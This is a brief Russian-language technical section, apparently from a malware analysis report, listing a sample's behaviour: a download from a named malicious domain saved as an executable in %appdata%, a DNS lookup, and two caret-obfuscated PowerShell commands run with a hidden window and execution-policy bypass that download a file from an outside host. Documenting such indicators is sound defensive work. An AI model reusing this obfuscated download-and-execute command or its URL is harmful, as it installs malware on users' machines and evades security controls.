Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pow^e^RshELl^.^exe -ExEcut^Ionp^o^LI^cY b^YPas^S -nOp^roFIlE -^w^In^Do^W^S^T^Y^le hI^DdE^N (n^ew^-O^B^JEct^ s^YS^tE^M^.n^eT^.wEBCL^I^En^T^).d^Ow^nL^OA^D^fi^lE('http://w...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /C "pow^e^RshELl^.^exe -ExEcut^Ionp^o^LI^cY b^YPas^S -nOp^roFIlE -^w^In^Do^W^S^T^Y^le hI^DdE^N (n^ew^-O^B^JEct^ s^YS^tE^M^.n^eT^.wEBCL^I^En^T^).d^Ow^nL^OA^D^fi^lE('http://w...' (со скрытым окном)